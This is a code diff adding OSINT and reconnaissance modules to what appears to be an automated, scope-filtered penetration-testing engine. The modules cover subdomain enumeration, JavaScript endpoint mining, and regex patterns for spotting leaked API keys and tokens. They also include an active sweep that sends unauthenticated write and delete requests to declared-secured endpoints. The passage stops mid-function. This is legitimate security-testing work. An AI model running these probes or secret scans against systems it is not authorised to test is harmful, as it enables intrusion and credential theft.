+                 a.allow_intrusive, a.parallel, a.expand)
+    eng.run(phases)
     print("\n" + json.dumps(eng.eng.summary(), indent=2))
     print("engagement dir:", eng.eng.dir)
 

--- a/engine/osint.py
+++ b/engine/osint.py
@@ -1,0 +1,175 @@
+#!/usr/bin/env python3
+"""
+osint.py — deterministic OSINT / scope-expansion phase.
+
+Given a domain, the FIRST step is discovering the in-scope footprint — subdomains,
+live hosts, services, tech — not jumping straight to the apex page. This shells out
+to the installed passive tools (subfinder, assetfinder) + certificate transparency
+(crt.sh), scope-filters the results, then probes each host for liveness + tech stack.
+The live in-scope targets feed per-target recon. No LLM in enumeration (it's mechanical).
+
+PD httpx isn't reliably present (the `httpx` on PATH is often the Python lib), so the
+liveness/tech probe uses a robust curl-based fingerprint that always works.
+"""
+import json
+import re
+import subprocess
+from shutil import which
+from urllib.parse import urlparse
+
+
+def _run(cmd, timeout=120):
+    try:
+        return subprocess.run(cmd, capture_output=True, text=True, timeout=timeout).stdout
+    except Exception:
+        return ""
+
+
+def enumerate_subdomains(apex, log=print):
+    subs = {apex}
+    if which("subfinder"):
+        out = _run(["subfinder", "-d", apex, "-silent"], 150)
+        names = [x.strip().lower() for x in out.splitlines() if x.strip()]
+        subs.update(names)
+        log(f"osint: subfinder -> {len(names)} name(s)")
+    if which("assetfinder"):
+        out = _run(["assetfinder", "--subs-only", apex], 90)
+        names = [x.strip().lower() for x in out.splitlines() if x.strip()]
+        subs.update(names)
+        log(f"osint: assetfinder -> +{len(names)} name(s)")
+    crt = _run(["curl", "-s", "-m", "25", f"https://crt.sh/?q=%25.{apex}&output=json"], 30)
+    try:
+        c = 0
+        for x in json.loads(crt):
+            for nm in x.get("name_value", "").split("\n"):
+                nm = nm.strip().lower()
+                if nm and "*" not in nm:
+                    subs.add(nm); c += 1
+        log(f"osint: crt.sh -> +{c} name(s)")
+    except Exception:
+        log("osint: crt.sh (no data / slow)")
+    return subs
+
+
+def _fingerprint(headers, body):
+    tech = []
+    for h in ("server", "x-powered-by", "x-generator"):
+        if headers.get(h):
+            tech.append(headers[h])
+    b = body[:8000].lower()
+    for marker, name in [("/_next/", "Next.js"), ("__next_data__", "Next.js"), ("/_nuxt/", "Nuxt"),
+                         ("ng-version", "Angular"), ("data-reactroot", "React"), ("wp-content", "WordPress"),
+                         ("gatsby", "Gatsby"), ("cdn.shopify", "Shopify"), ("drupal-", "Drupal"),
+                         ("readme.io", "ReadMe"), ("gitbook", "GitBook"), ("docusaurus", "Docusaurus")]:
+        if marker in b and name not in tech:
+            tech.append(name)
+    return tech
+
+
+def probe(host, timeout=12):
+    """Probe https then http; return target dict or None if dead."""
+    for scheme in ("https", "http"):
+        url = f"{scheme}://{host}/"
+        out = _run(["curl", "-s", "-m", str(timeout), "-L", "-D", "-", "-o", "/tmp/_osint_body", url], timeout + 6)
+        codes = re.findall(r'^HTTP/\S+\s+(\d{3})', out, re.M)
+        if not codes:
+            continue
+        headers = {}
+        for line in out.splitlines():
+            m = re.match(r'^([A-Za-z0-9\-]+):\s*(.*?)\s*$', line)
+            if m:
+                headers[m.group(1).lower()] = m.group(2)
+        try:
+            body = open("/tmp/_osint_body", encoding="utf-8", errors="replace").read()
+        except Exception:
+            body = ""
+        title = (re.search(r'<title[^>]*>([^<]*)', body, re.I) or [None, ""])[1].strip()
+        return {"host": host, "url": f"{scheme}://{host}/", "status": int(codes[-1]),
+                "server": headers.get("server", ""), "title": title[:70], "tech": _fingerprint(headers, body)}
+    return None
+
+
+def _run_stdin(cmd, stdin, timeout=240):
+    try:
+        return subprocess.run(cmd, input=stdin, capture_output=True, text=True, timeout=timeout).stdout
+    except Exception:
+        return ""
+
+
+def _pd_httpx():
+    """Return the ProjectDiscovery httpx binary (httpx-toolkit) — NEVER the Python `httpx`
+    lib that often shadows `httpx` on PATH. None if a real PD binary isn't found."""
+    for cand in ("httpx-toolkit",):
+        if which(cand):
+            try:
+                r = subprocess.run([cand, "-version"], capture_output=True, text=True, timeout=10)
+                blob = (r.stdout + r.stderr).lower()
+                if "projectdiscovery" in blob or "current version" in blob:
+                    return cand
+            except Exception:
+                pass
+    return None
+
+
+def probe_hosts(hosts, log=print):
+    """Liveness + tech probe. Prefers PD httpx-toolkit (batch, rich tech-detect); curl fallback."""
+    pd = _pd_httpx()
+    if pd:
+        out = _run_stdin([pd, "-silent", "-json", "-sc", "-title", "-td", "-server",
+                          "-timeout", "12", "-no-color"], "\n".join(hosts))
+        targets = []
+        for line in out.splitlines():
+            try:
+                d = json.loads(line)
+                targets.append({"host": d.get("input") or urlparse(d.get("url", "")).hostname,
+                                "url": d.get("url", ""), "status": d.get("status_code"),
+                                "server": d.get("webserver", ""), "title": (d.get("title") or "")[:70],
+                                "tech": d.get("tech", []) or []})
+            except Exception:
+                pass
+        return targets, pd
+    targets = [probe(h) for h in hosts]
+    return [t for t in targets if t], "curl(fallback — install PD httpx-toolkit)"
+
+
+def osint(scope, log=print, max_probe=80):
+    """Return live in-scope targets [{host,url,status,server,title,tech}]."""
+    apexes = set()
+    for s in scope.seeds:
+        h = urlparse(s if "://" in s else "//" + s).hostname
+        if h:
+            apexes.add(".".join(h.split(".")[-2:]))
+    for p in scope.in_scope:
+        p = p.lstrip("*.")
+        if "." in p and "/" not in p and ":" not in p and not p.startswith("re:"):
+            apexes.add(p)
+    log(f"osint: apex domain(s): {', '.join(sorted(apexes)) or '(none)'}")
+
+    subs = set()
+    for apex in sorted(apexes):
+        subs |= enumerate_subdomains(apex, log)
+    in_scope = [s for s in sorted(subs) if scope.in_scope_host(s)]
+    log(f"osint: {len(subs)} name(s) discovered -> {len(in_scope)} in scope; probing liveness + tech...")
+
+    probed = in_scope[:max_probe]
+    targets, tool = probe_hosts(probed, log)
+    for t in targets:
+        log(f"osint:   LIVE  {(t.get('host') or '?'):28s} [{t.get('status')}] "
+            f"{('· ' + ', '.join(t['tech'])) if t.get('tech') else ''}")
+    dead = len(probed) - len(targets)
+    log(f"osint: {len(targets)} live target(s) via {tool}, {dead} dead/no-DNS "
+        f"(decommissioned; verify before claiming takeover)")
+    return targets
+
+
+if __name__ == "__main__":
+    import sys
+    sys.path.insert(0, __file__.rsplit("/", 1)[0])
+    from scope import Scope
+    if len(sys.argv) > 1:
+        dom = sys.argv[1].replace("https://", "").replace("http://", "").strip("/")
+        sc = Scope(in_scope=[dom, "*." + dom], seeds=["https://" + dom + "/"], name="adhoc")
+        for t in osint(sc):
+            print(f"  {t['url']:38s} [{t['status']}] {t['server']:18s} {', '.join(t['tech'])}")
+    else:
+        print("usage: python3 osint.py <domain>")

--- a/engine/recon.py
+++ b/engine/recon.py
@@ -1,0 +1,623 @@
+#!/usr/bin/env python3
+"""
+recon.py — deterministic SPA-aware attack-surface recon.
+
+Agent-driven recon times out on real SPAs: every path returns the app shell, so
+"crawling" finds nothing and the model burns its budget. The real surface lives in
+the JavaScript bundles (the app references its own API routes / backend hosts). That
+extraction is mechanical, so we do it in CODE — no LLM in the find-step:
+
+  fetch seed HTML + robots/sitemap  ->  pull same-origin JS bundles  ->  regex-mine
+  endpoints (relative /api routes, absolute backend hosts, forms, Next.js data)  ->
+  scope-filter  ->  deterministic vuln-class heuristic
+
+This is exactly the technique that surfaces a SPA's real API endpoints by hand (e.g. an
+unauthenticated chat/LLM route buried in a bundle). Classification is a cheap keyword
+heuristic (the agent is reserved for the HUNT phase, where judgment is needed).
+
+stdlib-only fallback; uses `requests` if available (gzip/redirects handled cleanly).
+"""
+import re
+from shutil import which
+from urllib.parse import urljoin, urlparse
+
+_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 "
+       "(KHTML, like Gecko) Chrome/124.0 Safari/537.36")
+
+try:
+    import requests
+    _SESS = requests.Session()
+    _SESS.headers["User-Agent"] = _UA
+
+    def _get(url, timeout=20):
+        try:
+            r = _SESS.get(url, timeout=timeout, allow_redirects=True)
+            return r.text, r.url, {k.lower(): v for k, v in r.headers.items()}
+        except Exception:
+            return "", url, {}
+except ImportError:                          # stdlib fallback
+    import gzip
+    import urllib.request
+
+    def _get(url, timeout=20):
+        try:
+            req = urllib.request.Request(url, headers={"User-Agent": _UA, "Accept-Encoding": "gzip"})
+            r = urllib.request.urlopen(req, timeout=timeout)
+            data = r.read()
+            if r.headers.get("Content-Encoding") == "gzip":
+                data = gzip.decompress(data)
+            return data.decode("utf-8", "replace"), r.geturl(), {k.lower(): v for k, v in r.headers.items()}
+        except Exception:
+            return "", url, {}
+
+JS_SRC = re.compile(r'<script[^>]+src=["\']([^"\']+\.js[^"\']*)["\']', re.I)
+REL_API = re.compile(
+    r'''["'`](/(?:api|rest|graphql|v\d[\w.]*|auth|oauth|users?|account|admin|internal|webhook|'''
+    r'''upload|download|files?|proxy|fetch|search|query|email|chat|ai|llm|gateway|service|'''
+    r'''session|token|export|import|report|invoice|order)[A-Za-z0-9/_.\-]*)["'`]''')
+ABS_URL = re.compile(r'https?://[A-Za-z0-9.\-]+(?:/[A-Za-z0-9/_.\-]*)?')
+NEXT_DATA = re.compile(r'/_next/data/[A-Za-z0-9/_.\-]+')
+FORM_BLOCK = re.compile(r'<form[\s\S]{0,600}?</form>', re.I)
+FORM_ACTION = re.compile(r'action=["\']([^"\']*)["\']', re.I)
+INPUT_NAME = re.compile(r'name=["\']([^"\']+)["\']', re.I)
+
+# third-party / framework noise to exclude from "absolute backend host" mining
+NOISE = re.compile(
+    r'w3\.org|schema\.org|googleapis|gstatic|fonts?\.|sentry|google-?analytics|googletagmanager|'
+    r'cloudflare|jsdelivr|unpkg|npmjs|github\.com|mozilla|react\.dev|nextjs\.org|vimeo|'
+    r'example\.(com|org)|doubleclick|hotjar|segment|intercom|facebook|linkedin|twitter|youtube', re.I)
+
+# an item is real attack surface (vs. a marketing/content page) if its path looks like an
+# API/auth/file route, OR it carries a query parameter, OR it's a form submission.
+API_HINT = re.compile(
+    r'/(api|rest|graphql|gql|v\d[\w.]*|internal|webhook|auth|oauth|token|sso|saml|login|signin|'
+    r'register|upload|download|admin|proxy|fetch|gateway|service|session|export|import|search|'
+    r'query|user|users|account|order|invoice|file|files|report|_next/data)(/|$)', re.I)
+
+
+def _testable(item):
+    u = item.get("url", "")
+    return bool(API_HINT.search(urlparse(u).path)) or "?" in u or \
+        item.get("source") == "form" or bool(item.get("param"))
+
+
+def _mine(text, found_rel, found_abs):
+    for m in REL_API.findall(text):
+        found_rel.add(m)
+    for m in NEXT_DATA.findall(text):
+        found_rel.add(m)
+    for m in ABS_URL.findall(text):
+        if not NOISE.search(m):
+            found_abs.add(m.rstrip('.,);"\''))
+
+
+# high-signal secret patterns (subset of the offensive-osint catalog) for JS-bundle scanning
+SECRET_PATTERNS = [
+    ("AWS access key", re.compile(r'\bAKIA[0-9A-Z]{16}\b')),
+    ("Google/Firebase API key", re.compile(r'\bAIza[0-9A-Za-z_\-]{35}\b')),
+    ("Anthropic key", re.compile(r'\bsk-ant-[0-9A-Za-z\-]{20,}\b')),
+    ("OpenAI key", re.compile(r'\bsk-(?:proj-)?[A-Za-z0-9_\-]{20,}T3BlbkFJ[A-Za-z0-9_\-]{20,}\b')),
+    ("Slack token", re.compile(r'\bxox[baprs]-[0-9A-Za-z\-]{10,}\b')),
+    ("GitHub token", re.compile(r'\bgh[pousr]_[0-9A-Za-z]{36,}\b')),
+    ("Stripe live key", re.compile(r'\bsk_live_[0-9A-Za-z]{24,}\b')),
+    ("Twilio account SID", re.compile(r'\bAC[0-9a-f]{32}\b')),
+    ("Private key block", re.compile(r'-----BEGIN (?:RSA |EC |OPENSSH |DSA |PGP )?PRIVATE KEY-----')),
+    ("JWT", re.compile(r'\beyJ[A-Za-z0-9_\-]{10,}\.eyJ[A-Za-z0-9_\-]{10,}\.[A-Za-z0-9_\-]{10,}')),
+    ("EmailJS service/template id", re.compile(r'\b(?:service|template)_(?=[a-z0-9]*[0-9])[a-z0-9]{6,}\b')),
+    ("Hardcoded secret assignment", re.compile(
+        r'(?:api[_\-]?key|apikey|client[_\-]?secret|access[_\-]?token|auth[_\-]?token|publicKey|user_id)'
+        r'["\']?\s*[:=]\s*["\']([A-Za-z0-9_\-]{12,})["\']', re.I)),
+]
+# documentation/placeholder values to ignore
+_SECRET_NOISE = re.compile(r'EXAMPLE|YOUR_|XXXX|\.\.\.|<[^>]+>|process\.env|import\.meta', re.I)
+
+
+def scan_secrets(text, url):
+    """Return [{type, url, redacted}] for secrets exposed in client-side text. Values redacted."""
+    out, seen = [], set()
+    for label, pat in SECRET_PATTERNS:
+        for m in pat.finditer(text or ""):
+            tok = m.group(0)
+            window = (text[max(0, m.start() - 12):m.end() + 12])
+            if _SECRET_NOISE.search(tok) or _SECRET_NOISE.search(window):
+                continue
+            if tok in seen:
+                continue
+            seen.add(tok)
+            red = tok if len(tok) <= 10 else f"{tok[:6]}…{tok[-4:]}"
+            out.append({"type": label, "url": url, "redacted": red})
+    return out
+
+
+def spa_recon(scope, seeds=None, max_js=20, interesting_only=True, log=print):
+    """Deterministically map the in-scope surface. Returns (surface_items, oos_hosts).
+    seeds: explicit seed URLs (e.g. OSINT-discovered live hosts); defaults to scope.seeds.
+    interesting_only filters out marketing/content pages, keeping real attack surface."""
+    found_rel, found_abs, forms, js_urls, secrets = set(), set(), [], set(), []
+    seed_base = ""
+    for seed in (seeds or scope.seeds):
+        if not scope.in_scope_host(seed):
+            log(f"recon: seed {seed} not in scope — skip"); continue
+        html, final, hdrs = _get(seed)
+        base = f"{urlparse(final).scheme}://{urlparse(final).netloc}"
+        if not seed_base:
+            seed_base = base
+        log(f"recon: fetched {seed} ({len(html)} bytes, server={hdrs.get('server','?')})")
+        for p in ("/robots.txt", "/sitemap.xml"):
+            t, _, _ = _get(base + p)
+            for a, b in re.findall(r'(?:Allow|Disallow):\s*(\S+)|<loc>([^<]+)</loc>', t):
+                pp = a or b
+                if pp:
+                    found_rel.add(pp if pp.startswith('/') else (urlparse(pp).path or '/'))
+        _mine(html, found_rel, found_abs)
+        secrets += scan_secrets(html, final)
+        for m in JS_SRC.findall(html):
+            ju = urljoin(base, m)
+            if scope.in_scope_host(ju):
+                js_urls.add(ju)
+        for fm in FORM_BLOCK.findall(html):
+            act = FORM_ACTION.search(fm)
+            forms.append({"action": urljoin(base, act.group(1)) if act else seed,
+                          "params": INPUT_NAME.findall(fm)})
+
+    for ju in list(js_urls)[:max_js]:
+        js, _, _ = _get(ju)
+        if js:
+            _mine(js, found_rel, found_abs)
+            secrets += scan_secrets(js, ju)
+    # dedup secrets by (type, redacted)
+    _seen = set()
+    secrets = [s for s in secrets if not (s["type"], s["redacted"]) in _seen
+               and not _seen.add((s["type"], s["redacted"]))]
+    log(f"recon: mined {len(found_rel)} route(s), {len(found_abs)} absolute url(s), "
+        f"{len(forms)} form(s), {len(secrets)} secret(s) from {len(js_urls)} JS bundle(s)")
+    for s in secrets:
+        log(f"recon:   🔑 SECRET {s['type']} = {s['redacted']} in {s['url']}")
+
+    items, oos = [], set()
+    for rel in sorted(found_rel):
+        url = rel if rel.startswith('http') else urljoin(seed_base + '/', rel.lstrip('/'))
+        if scope.in_scope_host(url):
+            items.append({"url": url, "param": "", "source": "js/html"})
+    for au in sorted(found_abs):
+        if scope.in_scope_host(au):
+            items.append({"url": au, "param": "", "source": "absolute"})
+        else:
+            oos.add(urlparse(au).netloc)
+    for f in forms:
+        if scope.in_scope_host(f["action"]):
+            for p in (f["params"] or [""]):
+                items.append({"url": f["action"], "param": p, "source": "form", "method": "POST"})
+
+    seen, uniq = set(), []
+    for it in items:
+        k = (it["url"], it.get("param", ""))
+        if k not in seen:
+            seen.add(k); uniq.append(it)
+    if interesting_only:
+        testable = [it for it in uniq if _testable(it)]
+        log(f"recon: {len(uniq)} route(s) total -> {len(testable)} testable endpoint(s) "
+            f"({len(uniq) - len(testable)} marketing/content pages filtered out)")
+        uniq = testable
+    # secrets are findings in themselves — always kept as info-leak items
+    for s in secrets:
+        uniq.append({"url": s["url"], "param": "", "vuln_class": "info-leak", "source": "secret",
+                     "note": f"{s['type']} exposed in client-side JS",
+                     "evidence": f"{s['type']} = {s['redacted']} (in {s['url']})"})
+    return uniq, sorted(oos)
+
+
+def classify(item):
+    """Cheap heuristic -> likely vuln class (no LLM). Param-name signals win first."""
+    url = item.get("url", "").lower()
+    p = (item.get("param", "") or "").lower()
+    PARAM = {
+        "open-redirect": {"url", "uri", "next", "redirect", "return", "returnurl", "return_url",
+                          "callback", "goto", "dest", "destination", "continue", "u", "link", "target"},
+        "lfi": {"file", "path", "page", "template", "include", "doc", "document", "filename", "filepath", "load"},
+        "ssrf": {"image", "imageurl", "image_url", "fetch", "webhook", "proxy", "feed", "host", "port", "ip", "endpoint"},
+        "idor": {"id", "uid", "user", "userid", "user_id", "account", "accountid", "order",
+                 "orderid", "invoice", "docid", "pid", "oid", "ref"},
+        "sqli": {"q", "query", "search", "keyword", "s", "term", "filter", "sort"},
+    }
+    for cls, names in PARAM.items():
+        if p in names:
+            return cls
+    rules = [
+        (("/graphql",), "graphql"),
+        (("/chat", "/ai", "/llm", "completion", "/assistant", "/agent", "prompt", "/copilot"), "llm-ai"),
+        (("redirect", "returnurl", "callback", "goto", "/go"), "open-redirect"),
+        (("/upload", "filename", "filepath", "/download", "/file"), "lfi"),
+        (("/account", "/users", "/user/", "userid", "/profile", "/order", "/invoice", "/report", "/export"), "idor"),
+        (("/search", "/query", "keyword"), "sqli"),
+        (("/login", "/signin", "/register", "/auth", "/oauth", "/token", "/session"), "auth-bypass"),
+        (("/proxy", "/fetch", "webhook"), "ssrf"),
+    ]
+    for keys, cls in rules:
+        if any(k in url for k in keys):
+            return cls
+    return "idor" if p else "info-leak"
+
+
+def classify_all(item, max_classes=3):
+    """Ranked list of plausible vuln classes for an endpoint (multi-class hunting). A preset
+    class (e.g. a secret finding) stays single-class — don't multi-test a confirmed info-leak."""
+    if item.get("source") == "secret" and item.get("vuln_class"):
+        return [item["vuln_class"]]
+    classes = [classify(item)]
+    url = item.get("url", "").lower()
+    p = (item.get("param", "") or "").lower()
+    extras = []
+    if any(k in url for k in ("/chat", "/ai", "/llm", "/assistant", "/agent", "/copilot")):
+        extras += ["llm-ai", "ssrf", "info-leak"]
+    if any(k in url for k in ("/search", "/query")) or p in ("q", "query", "search", "s", "keyword", "filter"):
+        extras += ["xss", "sqli", "ssti"]
+    if "redirect" in url or p in ("url", "uri", "next", "redirect", "return", "callback", "dest", "u"):
+        extras += ["open-redirect", "ssrf"]
+    if "/graphql" in url:
+        extras += ["graphql", "info-leak"]
+    if any(k in url for k in ("/api", "/rest", "/v1", "/v2")):
+        extras += ["info-leak", "idor", "auth-bypass"]
+    if p:  # any parameter is a generic injection / IDOR surface
+        extras += ["idor", "sqli", "xss"]
+    for e in extras:
+        if e not in classes:
+            classes.append(e)
+    return classes[:max_classes]
+
+
+# tracking / cache params with no attack value — dropped from the surface
+PARAM_NOISE = {"utm_source", "utm_medium", "utm_campaign", "utm_content", "utm_term", "gclid",
+               "fbclid", "msclkid", "mc_cid", "mc_eid", "ref", "trk", "v", "ver", "_", "ts",
+               "cache", "cb", "rnd", "version"}
+
+
+def classes_for_param(name, url=""):
+    """Deterministic per-parameter attack categorization (name-driven). Returns ranked classes."""
+    n = (name or "").lower()
+    cls = []
+    def add(*cs):
+        for c in cs:
+            if c not in cls:
+                cls.append(c)
+    if n in ("url", "uri", "next", "dest", "destination", "u", "link", "target", "return", "continue") \
+            or any(k in n for k in ("redirect", "returnurl", "return_to", "callback", "goto", "forward")):
+        add("open-redirect", "ssrf")
+    if any(k in n for k in ("image", "fetch", "webhook", "proxy", "feed", "remote", "load_url")):
+        add("ssrf")
+    if (any(k in n for k in ("file", "path", "template", "include", "document", "folder", "dir"))
+            and not n.endswith("id")):
+        add("lfi")
+    if n in ("id", "uid", "pid", "oid", "gid") or n.endswith("_id") or n.endswith("id") \
+            or any(k in n for k in ("user", "account", "order", "invoice", "node", "post", "item", "doc", "page", "cat", "tag", "profile")):
+        add("idor", "sqli")
+    if n in ("q", "s", "query", "search", "keyword", "filter", "term", "sort", "name", "email", "cat", "tag", "lang"):
+        add("sqli", "xss")
+    if any(k in n for k in ("auth", "token", "session", "login", "sso", "saml", "oauth")):
+        add("auth-bypass")
+    if not cls:
+        add("sqli", "xss", "idor")     # any reflected/used param is a generic injection/IDOR surface
+    return cls[:3]
+
+
+def _gau_urls(scope, log):
+    """Passive: gau historical parameterized URLs (in-scope). url -> source."""
+    import subprocess
+    from urllib.parse import urlparse
+    if not which("gau"):
+        log("params: gau not installed — skipping historical param discovery")
+        return {}
+    apexes = set()
+    for s in scope.seeds:
+        h = urlparse(s if "://" in s else "//" + s).hostname
+        if h:
+            apexes.add(".".join(h.split(".")[-2:]))
+    urls = {}
+    for apex in sorted(apexes):
+        try:
+            out = subprocess.run(["gau", apex], capture_output=True, text=True, timeout=120).stdout
+        except Exception:
+            out = ""
+        for u in out.splitlines():
+            u = u.strip()
+            if u and "?" in u and scope.in_scope_host(u):
+                urls.setdefault(u, "gau-historical")
+    log(f"params: gau -> {len(urls)} in-scope parameterized historical URL(s)"
+        + ("" if urls else " (0 — gau likely rate-limited/transient this run; katana below is independent)"))
+    return urls
+
+
+def _katana_urls(scope, log, depth=2, timeout=150):
+    """Active live crawl (katana, GET-only) -> in-scope URLs. Independent of gau's flakiness."""
+    import subprocess
+    if not which("katana"):
+        log("params: katana not installed — skipping live crawl")
+        return {}
+    urls, crawled = {}, 0
+    for seed in scope.seeds:
+        try:
+            out = subprocess.run(["katana", "-u", seed, "-silent", "-jc", "-d", str(depth),
+                                  "-kf", "all", "-c", "10", "-timeout", "10", "-rl", "100"],
+                                 capture_output=True, text=True, timeout=timeout).stdout
+        except Exception:
+            out = ""
+        for u in out.splitlines():
+            u = u.strip()
+            if u and scope.in_scope_host(u):
+                crawled += 1
+                if "?" in u:
+                    urls.setdefault(u, "katana-crawl")
+    log(f"params: katana live-crawl -> {crawled} in-scope URL(s), {len(urls)} parameterized")
+    return urls
+
+
+def _probe(url, timeout=12):
+    """GET url, return (status_code, body). Status-aware (unlike _get)."""
+    import subprocess
+    try:
+        out = subprocess.run(["curl", "-s", "-m", str(timeout), "-L", "-w", "\\n__ST__%{http_code}", url],
+                             capture_output=True, text=True, timeout=timeout + 5).stdout
+        if "__ST__" in out:
+            body, st = out.rsplit("__ST__", 1)
+            return (int(st.strip()) if st.strip().isdigit() else 0), body
+        return 0, out
+    except Exception:
+        return 0, ""
+
+
+def prune_inert_params(items, log=print):
+    """Drop param items whose ENDPOINT is dead (>=400) or whose PARAM is inert (no effect on the
+    response beyond echoing itself). Deterministic: marker-normalized body-diff vs the no-param
+    baseline — removing the marker first neutralizes the canonical/og:url reflection trap. Keeps
+    only live, processable params. (Active: ~1 request per unique endpoint + 1 per param.)"""
+    kept, dead, inert, base_cache = [], 0, 0, {}
+    marker = "zq9k7xp"
+    for it in items:
+        base_path = it.get("url", "").split("?", 1)[0]
+        param = it.get("param", "")
+        if base_path not in base_cache:
+            base_cache[base_path] = _probe(base_path)
+        bcode, bbody = base_cache[base_path]
+        if bcode == 0 or bcode >= 400:
+            dead += 1
+            continue                                   # dead endpoint
+        tcode, tbody = _probe(f"{base_path}?{param}={marker}")
+        if tcode >= 400:
+            dead += 1
+            continue
+        norm = tbody.replace(marker, "")               # strip the param's own echo (canonical/og:url)
+        if abs(len(norm) - len(bbody)) <= 8 and norm[:6000] == bbody[:6000]:
+            inert += 1
+            continue                                   # param ignored — no effect on response
+        kept.append(it)
+    if dead or inert:
+        log(f"params: inertness-prune dropped {dead} dead-endpoint + {inert} inert param(s) "
+            f"-> {len(kept)} live/processable remain")
+    return kept
+
+
+OPENAPI_PATHS = ["/openapi.json", "/swagger.json", "/api/openapi.json", "/v1/openapi.json",
+                 "/api-docs", "/swagger/v1/swagger.json", "/api/v1/openapi.json"]
+
+
+def classes_for_openapi(path, method, op, secured):
+    """Categorize an OpenAPI operation into attack classes (name + shape driven)."""
+    pl = path.lower()
+    cls = []
+    def add(*cs):
+        for c in cs:
+            if c not in cls:
+                cls.append(c)
+    if "{" in path:                       # path parameter -> object reference (IDOR/BOLA)
+        add("idor")
+    if any(k in pl for k in ("/admin", "permission", "role", "/users", "/orgs", "deactivate",
+                             "reactivate", "/members")):
+        add("auth-bypass")                # broken access control / privilege escalation
+    if any(k in pl for k in ("sso", "saml")):
+        add("saml")
+    if any(k in pl for k in ("oauth", "keycloak", "/auth", "/login", "token")):
+        add("auth-bypass")
+    has_param = any(pr.get("in") in ("query", "path") for pr in op.get("parameters", []))
+    if has_param or method in ("post", "put", "patch"):
+        add("sqli")
+    if not cls:
+        add("info-leak")
+    return cls[:3]
+
+
+def auth_enforcement_sweep(spec, base, log=print, junk="zzz-pentest-nonexistent-00000"):
+    """Probe each DECLARED-secured op unauthenticated; flag any that don't reject (the #1 API risk:
+    declared != enforced). SAFE: junk path-ids (destructive ops hit non-existent resources), empty
+    bodies (writes hit validation, not execution). 2xx/422 unauth = NOT enforced. Returns broken items."""
+    import urllib.request
+    import urllib.error
+    import time
+    glob = "security" in spec
+    broken, n = [], 0
+    for path, methods in spec.get("paths", {}).items():
+        for m, op in methods.items():
+            if m not in ("get", "post", "put", "patch", "delete"):
+                continue
+            if not (("security" in op and op["security"] != []) or ("security" not in op and glob)):
+                continue
+            url = base + path
+            for pp in op.get("parameters", []):
+                if pp.get("in") == "path":
+                    url = url.replace("{%s}" % pp["name"], junk)
+            url = url.replace("{", "").replace("}", "")
+            q = [f"{pp['name']}={junk}" for pp in op.get("parameters", [])
+                 if pp.get("in") == "query" and pp.get("required")]
+            if q:
+                url += ("&" if "?" in url else "?") + "&".join(q)
+            data = b"{}" if m in ("post", "put", "patch") else None
+            req = urllib.request.Request(url, data=data, method=m.upper(),
+                                         headers={"Accept": "application/json", "Content-Type": "application/json"})
+            try:
+                code = urllib.request.urlopen(req, timeout=10).status
+            except urllib.error.HTTPError as e:
+                code = e.code
+            except Exception:
+                code = 0
+            n += 1
+            if code in (200, 201, 202, 204, 422):     # reached the handler/validation unauth = NOT enforced
+                broken.append({"url": url, "param": "", "vuln_class": "auth-bypass", "source": "auth-sweep",
+                               "note": f"{m.upper()} {path} -> {code} UNAUTH (declared-secured, NOT enforced)"})
+            time.sleep(0.03)
+    if broken:
+        log(f"auth-sweep: ⚠ {len(broken)}/{n} declared-secured op(s) NOT auth-enforced (BROKEN function-level auth)")
+    else:
+        log(f"auth-sweep: {n}/{n} declared-secured op(s) correctly enforce auth (401/403) — verified")
+    return broken
+
+
+WELLKNOWN = ["/__/firebase/init.json", "/.well-known/oauth-authorization-server",
+             "/.well-known/oauth-protected-resource", "/.well-known/openid-configuration",
+             "/.well-known/security.txt", "/security.txt", "/robots.txt"]
+
+
+def platform_recon(scope, log=print):
+    """Probe platform/.well-known config endpoints — cheap, high-signal: Firebase config disclosure,
+    OAuth/OIDC discovery (reveals authorize/token/register), robots disallows. Returns surface items."""
+    import json as _json
+    from urllib.parse import urlparse
+    items, seen = [], set()
+    for seed in scope.seeds:
+        u = urlparse(seed if "://" in seed else "https://" + seed)
+        base = f"{u.scheme or 'https'}://{u.hostname}"
+        if base in seen:
+            continue
+        seen.add(base)
+        for wk in WELLKNOWN:
+            code, body = _probe(base + wk)
+            if code != 200:
+                continue
+            b = body.lstrip()
+            if "firebase/init" in wk and b.startswith("{"):
+                try:
+                    cfg = _json.loads(body)
+                    log(f"platform: {base}{wk} -> Firebase config (projectId={cfg.get('projectId','')}, "
+                        f"bucket={cfg.get('storageBucket','')})")
+                    items.append({"url": base + wk, "param": "", "vuln_class": "info-leak", "source": "platform",
+                                  "note": f"Firebase config disclosed (projectId={cfg.get('projectId','')})"})
+                except Exception:
+                    pass
+            elif ("oauth" in wk or "openid" in wk) and b.startswith("{"):
+                try:
+                    meta = _json.loads(body)
+                    log(f"platform: {base}{wk} -> OAuth/OIDC discovery (issuer={meta.get('issuer','')})")
+                    items.append({"url": base + wk, "param": "", "vuln_class": "info-leak", "source": "platform",
+                                  "note": "OAuth/OIDC discovery exposed"})
+                    for k in ("authorization_endpoint", "token_endpoint", "registration_endpoint"):
+                        if meta.get(k):
+                            items.append({"url": meta[k], "param": "", "vuln_class": "oauth",
+                                          "source": "platform", "note": f"OAuth {k}"})
+                except Exception:
+                    pass
+            elif "robots" in wk:
+                dis = [ln.split(":", 1)[1].strip() for ln in body.splitlines()
+                       if ln.lower().startswith("disallow:") and ln.split(":", 1)[1].strip() not in ("", "/")]
+                if dis:
+                    log(f"platform: {base}/robots.txt disallows {len(dis)} path(s): {', '.join(sorted(set(dis))[:6])}")
+                    for d in sorted(set(dis))[:10]:
+                        items.append({"url": base + d, "param": "", "vuln_class": "info-leak",
+                                      "source": "robots-disallow", "note": "robots-disallowed path"})
+            elif "security.txt" in wk:
+                log(f"platform: {base}{wk} -> security.txt present")
+    return items
+
+
+def openapi_recon(scope, log=print):
+    """If the target exposes an OpenAPI schema, parse it into categorized (path,method,class) work
+    units — the ideal deterministic recon for an API host. Returns already-expanded surface items."""
+    import json as _json
+    items = []
+    for seed in scope.seeds:
+        host = seed.rstrip("/")
+        if "://" not in host:
+            host = "https://" + host
+        for op_path in OPENAPI_PATHS:
+            code, body = _probe(host + op_path)
+            if code != 200 or not body.lstrip().startswith("{"):
+                continue
+            try:
+                spec = _json.loads(body)
+            except Exception:
+                continue
+            paths = spec.get("paths")
+            if not paths:
+                continue
+            glob_sec = "security" in spec
+            title = spec.get("info", {}).get("title", "API")
+            noauth = 0
+            for p, methods in paths.items():
+                for m, opn in methods.items():
+                    if m not in ("get", "post", "put", "patch", "delete"):
+                        continue
+                    secured = ("security" in opn and opn["security"] != []) or \
